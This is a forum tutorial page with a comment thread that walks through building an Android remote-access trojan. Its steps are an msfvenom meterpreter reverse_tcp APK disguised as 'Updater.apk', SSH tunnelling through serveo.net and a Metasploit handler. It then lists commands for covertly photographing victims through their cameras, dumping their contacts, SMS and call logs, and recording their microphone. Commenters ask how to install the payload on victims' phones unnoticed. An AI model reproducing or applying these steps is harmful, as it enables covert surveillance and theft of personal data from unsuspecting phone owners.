SORRY, THIS WEB-PAGE IS NOW (Almost) CLOSED...!!!
- Note:- This thread is now CLOSED by H4ck3R_777 (The Admin) due to violation of our Terms. I was informed that many attacks on several persons` Mobile Phones are done by using my information as a base guide. We never invade people`s privacies and we don't want it to be done by other people, specially using our Information & Techniques. That's Y , I've decided to close THIS guide PERMANENTLY! (Screenshots, Requirements, Headings, Commands & Problems_Section R not gonna Remove)
- If U want further Guides & Techniques, Join our WhatsApp Group (Group#1 , Group#2) or Telegram Group. Our Groups are open for all people.
- All the groups are now Strictly watched by our Responsible & Genius Administrators!
Requirements
1). Android 5.0 (Tutorial for Androids Lower Than 5.0 is HERE)
2). TermuX Android App (Download it from Play Store
3). Installed Metasploit Framework in TermuX (Tutorial Here)
4). Active Internet/WiFi Connection
5). TermuX should be allowed to use External Storage (For this only enter this command only at once: "termux-setup-storage")
6). MiXplorer (For signing APK file, Download it from UpToDown Website)
7). MiX Signer (APK Signer for MiXplorer, Download it from Play Store)
8). (Recommended) Use Hacker`s Keyboard for entering commands in TermuX easily.
Step 1: Port Forwarding
pkg install openssh
ssh -R (Desired_Port):localhost:(Desired_Port) serveo.net
- (Optional) Name this session: Port Forwarding
Step 2: Creating APK File with Embedded Payload
msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4564 R > storage/downloads/Updater.apk
- Wait for a minute...
Step 3: Signing Newly Generated APK File
- Long Press on "Un-Signed APK File (Updater.apk)" and select "MENU button" on top right corner of MiXplorer, then select "SIGN".
Step 4: Setup Metasploit in TermuX
- Activate Metasploit Framework in TermuX by entering this command in new session:
msfconsole
mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start
- Wait for a min...
msf> use exploit/multi/handler
msf> set payload android/meterpreter/reverse_tcp
msf> set LHOST localhost
msf> set LPORT 4564
msf> exploit -j -z
Step 5: Installing APK in Victim's Android Device
sessions -i (Session ID)
- BINGO.......!!!!!!!! You have successfully hacked your Victim`s Android Device
!!!...Need Some Help While Hacking...???
You can enter: {meterpreter> help} command, for all the available commands, here, I`ve simplified some commands for you.
- Taking Stealth Snapshot from Front Camera
Just enter this command for this:
webcam_snap -i 2 -p storage/downloads/X-Stealth-Snapshot-F.jpg
Here, in this command, 2 is representing the front camera. For Back camera, you have to use 1.
Your Stealth Snapshot can be found here: (Default Write Storage) -> downloads -> X-Stealth-Snapshot-F.jpg
- Taking Stealth Snapshot from Rear Camera
Just as the above, but this time, we will use 1,
webcam_snap -i 1 -p storage/downloads/X-Stealth-Snapshot-R.jpg
Your Stealth Snapshot can be found here: (Default Write Storage) -> downloads -> X-Stealth-Snapshot-R.jpg
- Fetching All Contacts
To fetch contacts, just enter this command:
dump_contacts -o storage/downloads/X-Contacts.txt
Conacts will be saved in : (Default Write Storage) -> downloads -> X-Contacts.txt
- Fetching All SMS
Just like above,
dump_sms -o storage/downloads/X-SMS.txt
All the SMS will be saved in : (Default Write Storage) -> downloads -> X-SMS.txt
- Fetching Call Log
Just enter this:
dump_calllog -o storage/downloads/X-CallLog.txt
Call Log will be saved in : (Default Write Storage) -> downloads -> X-CallLog.txt
- Spying Through Microphone
Here, you have to edit the duration of the recording microphone (default: 1s). Command for 10 seconds recording is this:
record_mic -d 10 -f storage/downloads/X-Spy-Record.mp3
Spy Recording will be saved in : (Default Write Storage) -> downloads -> X-Spy-Record.mp3
???...Common Problems...???
- Metasploit not running on TermuX
This might happen, if you do anything wrong in installing TermuX on android. If you see error like GEMS not found, or any this kind of error, simply Delete TermuX with its data, and reinstall it.
- msfvenom/msfconsole : command not found!
There are two possible reasons for that error.
1). Metasploit is not properly installed on TermuX. That`s why, it was unable to create Command Shortcut. To fix this, uninstall the TermuX, with Data. Then reinstall TermuX and repeat all the Method again. This is actually a script error. I also faced this problem on first time installing Metasploit in TermuX!
2). Metasploit is successfully installed, but was unable to create the shortcut. To manage this, just enter:
- Manual Way
Just open a New Session and go to metasploit-framework directory, and enter ./msfconsole command, Like This (same for msfvenom):
cd metasploit-framework
./msfconsole
OR
./msfvenom
2). Shortcut Method
Those people who are not satisfied with the first one, and want to create a shortcut command, as the other programs set, enter the following commands one by one in a new session (msfvenom included):
ln -s /data/data/com.termux/files/home/metasploit-framework/msfconsole
mv msfconsole $PREFIX/binln -s /data/data/com.termux/files/home/metasploit-framework/msfvenom
mv msfvenom $PREFIX/bin
3). Still no luck (with msfvenom)!? , I`ve uploaded Updater.apk with default (LHOST=serveo.net , LPORT=4564) settings. Download it from there.
- Why we use serveo.net ...?
As I told before, NGROK does not provede a fixed Domain and Port. So, you have to generate a new APK file, when you plan to hack a phone, you hacked before. See what serveo says about NGROK:
- Why we are using MiXplorer for Signing the APK File ...?
Actually, there is no Other way to sign the APK file on Android. Otherwise, You have to sign the APP file in Your PC (Specially in Kali LinuX). MiXplorer is the Excellent way to sign the APK file, directly in Android.
- Metasploit Error: Failed to connect to the Database
Don`t worry about it. We have already made a solution for this :) . I think you have noticed earlier , that I was using "localhost" , instead of 127.0.0.1 or :::0:1 , as HOST. Actually, the "localhost" command automatically connects you to the available Local Host, no matter if it is 127.0.0.1 or :::0.1 or else.
But if you still want to fix it, enter the following commands in New Session of TermuX carefully:
mkdir -p $PREFIX/var/lib/postgresql
initdb $PREFIX/var/lib/postgresql
pg_ctl -D $PREFIX/var/lib/postgresql start
- Which Android Phone is best for H4ck1nG Purposes ...?
1). Google NeXuS phones/Tablets are Excellent for Hack1nG Purposes. As, they completely supports Kali NetHunter. NetHunter includes all the tools for hacking, and it works as an Android/Windows on a Tablet.
2). But if we talk about Android, Many H4ck3Rs say that Samsung Galaxy S5 is Excellent for Ha4ck1nG Purposes. It has a good Android Version (around 5.0), also Fully supports the TermuX Application.
Note:-
This information is for Educational Purposes Only. I`ll not be responsible of any Negative or Illegal use of this information. Also if you face any type of errors, or you think that I`ve missed something, then tell me in Comments Section. I`ll find the Suitable Solution for that. Anyways, Just use these tricks for FUN... Not for doing Illegal work. We are all Ethical H4ck3Rs, and never invade people Privacies.
Anyway, Thanks for reading my Thread (You can also join our WhatsApp Group for more information and Guides). BEST OF LUCK ...!
|==============> H4ck3R _777 <==============|
177 Responses
If You Liked My Guide, Then Don't Forget to Give Feedback ...!!!
WOW! It is really (somehow) WATCH_DOGS style hacking! Excellent work h4ck3r 777!
Step 1: Why It? Brother ..Help Me
me too,like as the problem. I thinks apk file is bug.
How to start port forwarding
"pkg install openssh"
Same here
Nice ! Tight tight tight tight!!!!!!
So I have everything installed and apparently functioning correctly. Now about the payload deployment. Ehhhhh hardware so I'm using a samsung s8. I have referenced so many sites/tutorials/blogs/forums..... which usb wireless adapter should be used? Most say - TP-Link TL-WN722N N150 High Gain USB Wireless WiFi
But nothing guarantees the chipset is correct or the linux kernel is correct for Termux. This is driving me mad. I feel I've done my homework before coming to you for help. Any suggestions would be appreciated!
Spanx
Spooner
I'm legit like. Just starting this today. And I've made it as far as the desired port part. Do I just enter it as (desired_port) or is there a specific command I'm supposed to be putting in? I'm very unsure. Cause the picture of details had numbers instead.
replace desired port with any 4 digit number port
Will any 4digit no do?
I have quite a problem
Oh and how do i send and install thr payload without social engineering but withoung embeeding it in another apk ?
Please solve my error
Brother, how to reinstall it? I I deleted termux and installed metasploit again but it did not Work. I mean the same thing happened again.
How do I write +× sign on the termux...pls I need help
Hello my friend !!thanks for tutorials I learned a lot of things with your help but I want to ask you something..when I used the ssh -R 4564:localhost:4564 serveo.net and connecting to a Android ,can this Android or anyone else connect to my phone ??I mean can I be hacked using the shh and exploit to someone ???
!!!... Your Welcome ...!!!
Step 1: Apk Is Not Created
My apk is not created... Please help me
follow my steps
Step 1: Mkdir /Data/Data/com.termux/Files/Home/Storage/Shared/Tmux
Step 2: Msfvenom -P Android/Meterpreter/reverse__tcp Lhost=127.0.0.1 Lport=4444 R>/Data/Data/com.termux/Files/Home/Storage/Shared/Tmux/virus.apk
Step 3: After All Successful Steps. You Find Your Appin Tmux Folder in Filemanage
What if the .apk is Installed on two different victim phones, How do you switch between victims even if that is possible and what is the command for keylogger and video capture. Sorry I am a Noob brother.
When I open the apk in my "victim's" phone, it doesn't show "meterpreter session 1 openned". Why is this happening, help me please
Hey how do I find my own desirable port. Please help. Thanks!!
Hello sir
I love your tutorials they are best and you are sharing a great knowledge to everyone thank you so much for it sir.
Sir i am getting issue while port forwarding i visited servio and found tcp port:1492 but sir its not connecting and the port privided by you 4564 it is also not connecting and the link for updater.apk sir the link is not opening please help sir .
Hai plese help me
apk is not opening in victims mobile
Same prblm bro
Same problem plz help hack3r....
What's the port I use for initial openssh? In place of 4564
I cant open why thé port dont open
Bro, i wanna join ur whatsapp , but it's full...Pl, do needful,
By d way , i am using termux and tried to bind payload with original apk in my android ,
But it shows either key tool not found error or , @rbsys ..../Android Manifest.xml not found error,
I have tried lot to solve it , e.g uninstall & reinstall Termux, Metasploit , Tmuxbunch 2.6 and 2.7 too, follow many youtube methods, Hax4us method, but at the end it's error as I said above...
Help me out plz...
I am using motog3 turbo android 6.1
Thx bro...
bro i am new to hacking. can use .jpj file instead of .apk file. if yes can you give me steps where to change the codes
Hey bro! I'm getting something like this. The apk is not opening in the victim's device. I've signed it too. I tried it in my own phone. But it's not opening. Please help me in this regard bro!
Same here, no session was created is showing
Are you able to uninstall the signed file and stop the hack
I can't install payload signed apk in my victims device?
Sir I am facing problem here, can u help me through this
Sir,
I have followed all steps but I didn't understand that how the system is identifying who's the victim? I mean I don't know the details of victim's phone than how will updater gets install in victim's device? Please help sir.
Sir,
Can we talk please,
I am struggling at some point and I am unable to understand that.
Please help me out.
I found this error while port forwarding through servo.net
xssh: connect to host servo.net port 22: Connection timed out
Please help me to get rid of this problem
Something confusing, how do I know the actual android device am hacking,please am confuse?
Try to hack your one, for testing purposes
Sir which localhost number i will enter in that like 4564
Yes. 4564 is just an example
man o man o mannnn you r absolutely amazing dude seriously you r progressing much better than anybody else....... salute to you brother..
I dont know which port to use , how do I know port no
Does the victim need the apk
So how can we sent the payload to victim phone
Y didn't it work android 9 and 10??..what's the solution for having control of victim mobile of having above android 10
Total noob here but exactly what or who are you connected to? Every site I read it never explains how or who
Hi my mobile phone is lost I want to get it back so please tell me if any steps from the above mentioned steps is missing that I have to follow.
I'm using Android phone but don't know where to locate +× signs on the termux... Pls someone should help me
!!!... THANKS ...!!!
wow, man this is really fantastic,
Still i have 3 more questions, an android machine? has to be an telefone, or is there an invoirment on kali linux or windows pc?
and how can we been sure that the victim open the file? what txt message can we best use for open the apk file....
when in the phone, the victim can't see nothing at all?
!!!... Many Thanks ...!!!
I need to hack my gif S8. I have same phone. I'll pay someone to get me set up. I dont have time for all this shit to learn. Just need access to the unknown.
Hey man first of all great guide, but I am facing a issue when I try to create the apk, here is the screenshot:
Its probably because I use ./ at the beginning but only msfvenom command not works for me. I am new in hacking so sorry for stupid questions ;)
Still the same issue:
mega.nz/#!uo9wSQRA!7_TqR8JqY_NJWZADNNZYEiBL1Imh1PvSrtK216m6uBc
Thanks man appreciate it, keep up the good work.
I downloaded the updater.akp through your the link you gave,but my device detected it ad a dangerous malware akp,prompting me to delete immediately to avoid adverse harm to my device which I did,please what other alternatives can I use?
FOR DENNIS RAZG!!
first of all you have to go to this directory $HOME/metasploit-framework/ then type ./msfvenom. you cannot directly run metasploit-framework in some mobile phones. I dont know the exact issue but maybe it depends from manufacturer to manufacturer. IF YOU WANT TO DIRECTLY USE METASPLOIT MAKE A LINK USING ln -s command or with just simply ln comman. if you want to make your phone READY-TO-HACK device. root it and install kali nethunter in it. if you donot want to root your phone jst install kali linux using app call linux deploy.
HOPE THIS WILL WORK FOR YOU.!!!!!!
>>> DUSTY WORLD :)
Try giving complete path like
./msfvenom -p android/meterpreter/reverse_tcp LHOST=serveo.net LPORT=4444 R > /data/data/com.termux/files/home/storage/downloads/updater.apk
(give your own port number which was used in establishing the tcp connection with servo.net)
Now it should work
R > $PWD/../storage/downloads/Updater.apk/
or
R > $HOME/storage/downloads/Updater.apk
Site for the forwarding proxy thingie is blocked by my AV. lol.
1). Beam.io
2). LocalXpose
3). Portmap.io
for everyone TOR is the best of all. right H4CK3R 777!!!!
Everything works fine but after establishing meterpreter session with the target the files that I get from target (like call log or images) are not accessible because they are getting stored in metasploit_framework folder in com.termux package if I give another folder path I'm getting permission denied. Please tell me if there's any other method to store the call logs or images in our device storage which is accessible. ( sorry for my bad English)
Bro ,
Can u show me how u access the image files of the victim.I tried but failed .help me..
Thanks..
My connection keeps disconnecting I don't know why.
Hello my friend ... I found a problem ...I installed metasploit but will not be recognized when it's called ...
please helpme and thank you
!!!... YouR WeLcoME ...!!!
However,it does not know commands like wecam.shot
Don't know why...
I've installed really everything.
Hello, I tried every port to connect. All my ports are closed ... please guide...thank
What is the next option if we don't have access to the receiving phone? Can the payload be applied discretely to another apk?
Thanks
null-byte.wonderhowto.com/forum/to-embed-msf-payload-original-apk-files-part-1-using-thefatrat-0188918/
7
YO! The best tutorial I've ever had. Many thanks brother.
!!!... Your Welcome DON LUMINA ...!!!
Can we install fluxion in Termux ?
Can i use it to back up victim whatsapp chat ?
Awesome tutorial im new to using termux. The this is a first step in to learning something a little different. I hope to learn alot from you in the future.
!!!... Thank You ...!!!
hi bro i am new so please can you help me ....i have this problem(loadError) also the Updater.apk is 0.00k
and do you have any kind of book can help me in this feild .thanks bro.
What is this eror for my bro....?
I always see this eror when i want to set payload
No bro i use 4G net with 3mb/s speed
I think this is for port. How can i check a special TCP port is open or not and if it's closed or blocked open it with termux?????
What about sending notification to victim phone, like "You won a dollar. Click here to claim it." Or when victim open browser on their phone, we force browser to open URL like "playstore.com"?
Pls help me out
Hi bro H4CK3R_777,
Help me with this problem
Is there something wrong with my Metasploit?
Can you help me bro? I have entered command Mkdir /Data/Data/com.termux/Files/Home/Storage/Shared/Tmux but only displays the 'no such file directory'
Sir while executing my payload it send me error mgs like this regularly plz help me how i can resolve this
Hi i am new to hacking and dont know about networking . Please help me. What is this TCP PORT and LOCALHOST ,how to get the desired detail from. What should i fill in the below
ssh -R (DesiredPort):localhost:(DesiredPort) serveo.net
The only way I know is using command "netstat -a"
In command prompt on windows
Download OS manager tool from your browser. It'll show the listening ports of your android device.
Thanks, great tutorial
Plsss, solve this error
Hi, first of all awesome tutorial, but I got a problem: no directory works, and yes, I tryed others folders(havent caught in screenshot), even tryed without any folder, just storage, but I always have this error of no such directory or file.
Any suggestions how to fix it?
Check typing downloads instead of Download
Please help me fix this or if you have time please please create one with 5568 as port for me
I have followed the same procedure as you said but this error has come!
u have to replace "(desired_port)" with a specific four digit number
How will i choose port,or can i use,the port you use here
Actually i am getting problem in step 5 i created apk successfully anf installed it in vctim phone but it is not opening in victims phone. Help me plss..
Thanks for android msf , bro!
btw, i want to share my tips
use apktoolX.apk (no need to busy with commends)
can edit in yaml file
Any idea why i can't set Auto in MiXplorer, and other thing is the link for MiX Signer is out of date, i found another for this, but still can't set auto
great post with step by step tutorial .
if ./msfvenom fail to create payload.. then try this method
for No options error
then try to execute like above screenshot...
nice post its working ...
ty @H4CK3R_777
Unknown command: webcam_snap
type command for help at msf> console
`msf> help`
Same here?? Has anyone solve this prob ?
how to use return button please help me fast and I want to know the time gap between opening the signed apk and generating session id
I already send it to my another phone so can anyone. Help me
Hi mate, nice post. I was wondering one thing, there's some way to put the .apk file or install the .apk file into the victim's phone whitout he realizing?
How to fix segmentation fault, please?
yo this is off topic but im being attacked someone was able to intercept a phone conversation i dont know how to explain it they were able to use my friends caller id and left a voicemail they were also able to while my friend was actually calling when i picked up i would hear someone else idk too much about hacking but is this a man in the middle attack?? is anyone able to eavesdrop on your call and be able to communicate to me while im conversating with someone but not have that person hear just me?
Hey bro! The apk is not opening in the victim's phone as well as in my phone. What shall I do?
Dear bro,
I new to this hacking world. I really thank to you for explaining clearly. I followed all the steps.
For checking purpose I install apk in my mobile and the results was confusing. Kindly help where I did the mistake. Screenshot mention below. Looking for you positive reply
By
Thak
Hi everyone a quick Important note:
1st of all please note that serveo is an open SSH which means you access it from any part of the world , the part where you put the LHOST as serveo.net is the dangerous part, which means the metepreter can be accessed by anyone who has a metasploit framework if they know the port no.
2nd note is setting the payload to android/meterpreter/reverse_tcp , while creating the listener is very important , because default it will be some other payload...
once created and the payload is sent and activated you can ezily connect to the victim from anywhere , with any internet, even if u have dynamic ip etc everything ....AS LONG AS YOU HAVE SET THE LISTENER AND THE SSH FORWARDER TO LOCALHOST AND YOU KNOW THE PORT NUMBER..
EVEN SOMEONE ELSE OTHER THAN YOU ALSO CAN CONNECT TO YOUR PAYLOAD AND GAIN A METERPRETER SESSION...
THIS IS MORE LIKE A DOUBLE EDGE.........
AND OPEN SSH ALSO GIVES THE IP SO BECAREFULL..... THATS ALSO THE ADVANTAGE IN NGROK AND SERVEO , IN NGROK IF YOU PAY THEN ONLY U CAN CONNECT TO YOU PAYLOAD OR ELSE IF U USE SERVEO EVERYONE CAN CONNECT.... SINCE THE PORT NO. IS ONLY 65000 NUMBERS
AND THERE ARE MILLION OF PEOPLE YOU WILL GET A SESSION AS LONG AS OTHERS HAVENT ACTIVELE CONNECTED THE OPEN SSH..
--THANK YOU!!!
Which app should I share to victim's phone
There R 2 possibilities,
Bro plz help... i install apk on victims mobile but it unable to open... and also i didnt getting notification of "meterpreter session opened" i stuck at this point plz bro help me...
You R Lucky to Find This Thread the LAST TIME!
I'm Gonna Close This Thread, Due to Violation of My TERMS.
I don't understand what happend every thing els is working fine please help ne understand this
Great work.
Keep up the amazing stuff!!!
Thank You!
The apk was created but it's size was 0 bites and after signing the apk it became 3.34kb and I can't install that file .It show the error "there was a problem parsing the package".I'm stuck here could u walk me through it.
My apk is not opening in the victims phone and no session is opening after the last command and after sending the APK into victims phone
Please help.
ssh -R (desired port):localhost:(desired port) serveo.net
This command, what is use the desired port number. How to find it.
What is ape use for folder.
Bro for me the session is not starting
Is it possible to install to the victims phone remotely or you should have a physical access to the phone and you install it yourself?
ssh -R 5432 :localhost: 5432 ssh: connect to host serveo.net port 22: Connection timed out
resources.infosecinstitute.com/lab-hacking-an-android-device-with-msfvenom/#gref
??
How analys
serveo isn't working these days. That's y it's happening
Hi Guys! It's MR_777 a close friend of H4ck3R_777. He's quiet busy these days, that's y couldn't answer your queries. Please join his WhatsApp or Telegram Group ( Telegram Recommended ) for your queries. He's active there mostly. The links are here : pastebin.com/JpBxH5re
The metapreter commands aint working please help
I'm stuck
I'm facing this problem no session was created every time I do. PLS fix the problem
Iam also facing same problem
what if I don't have access to the victim, there's no way the victim would lend it
Please help me on Termux
ssh: connect to host serveo.net port 22: Connection refused
Why bro
Same here bro
The send one on wlan works but the internet on doesn't
Idk the only problem is the remote port forwarding
(The error)
The victim installed the app but a session did not open, can the distance between you two affect the payload?
No I don't think so because he is connected to the internet
When I enter port forwarding comment iam getting this please help me with this bro reply me soom
ssh -R 4444:localhost:4444 serveo.net
kexexchangeidentification: read: Connection reset by peer
Connection reset by 159.89.214.31 port 22
how to find port number of mobile or computer
U can put random
what is desired port please help me exlpain
Share Your Thoughts